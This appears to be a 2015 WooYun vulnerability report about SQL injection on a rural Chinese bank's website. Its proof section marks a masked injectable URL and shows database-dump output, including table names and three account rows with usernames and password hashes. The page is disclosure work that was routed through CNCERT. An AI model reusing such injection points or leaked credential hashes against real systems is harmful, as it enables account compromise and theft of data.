某村镇银行SQL注入导致敏感密码泄露 | wooyun-2015-0140450| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140450

漏洞标题：某村镇银行SQL注入导致敏感密码泄露

漏洞作者：雅柏菲卡

提交时间：2015-09-13 14:20

修复时间：2015-10-30 14:44

公开时间：2015-10-30 14:44

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-13：细节已通知厂商并且等待厂商处理中
2015-09-15： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-25：细节向核心白帽子及相关领域专家公开
2015-10-05：细节向普通白帽子公开
2015-10-15：细节向实习白帽子公开
2015-10-30：细节向公众公开

简要描述：

..........

详细说明：

...............

漏洞证明：

http://**.**.**.**/index.php/News/nid/1422527204634149*
*處為注入點
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EBANK
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
Database: EBANK
[13 tables]
+-----------------+
| BS_CATEGROY     |
| BS_DIY          |
| BS_JOBS         |
| BS_MEMBER       |
| BS_NAVIGATION   |
| BS_NEWS         |
| BS_NEWSCATEGROY |
| BS_OPTIONS      |
| BS_PAGES        |
| BS_PRODUCTS     |
| BS_SLIDE        |
| BS_TEST         |
| TEST1           |
+-----------------+
[3 entries]
+------------+-----------------+-----+---------------+----------------------------------+----------+------------+
| CREATETIME | EMAIL           | GID | LASTLOGINTIME | PASSWORD                         | USERNAME | USID       |
+------------+-----------------+-----+---------------+----------------------------------+----------+------------+
| 1317173767 | admin@**.**.**.** | 1   | 1436403909    | aa581cb00e6a55a6653e4b52168dffd8 | admin    | 1          |
| 1369908431 | qq@**.**.**.**       | NULL | NULL          | bfd9f0cc586164634e1b9a255069ca5f | zxt      | 1369884582 |
| 1369884582 | lsj@**.**.**.**      | NULL | NULL          | aa581cb00e6a55a6653e4b52168dffd8 | lsj      | 1369908431 |
+------------+-----------------+-----+---------------+----------------------------------+----------+------------+

修复方案：

.................

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-09-15 14:43

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140450

漏洞标题：某村镇银行SQL注入导致敏感密码泄露

相关厂商：某村镇银行

漏洞作者：雅柏菲卡

提交时间：2015-09-13 14:20

修复时间：2015-10-30 14:44

公开时间：2015-10-30 14:44

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140450

漏洞标题：某村镇银行SQL注入导致敏感密码泄露

相关厂商：某村镇银行

漏洞作者： 雅柏菲卡

提交时间：2015-09-13 14:20

修复时间：2015-10-30 14:44

公开时间：2015-10-30 14:44

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0140450"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：雅柏菲卡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源雅柏菲卡@乌云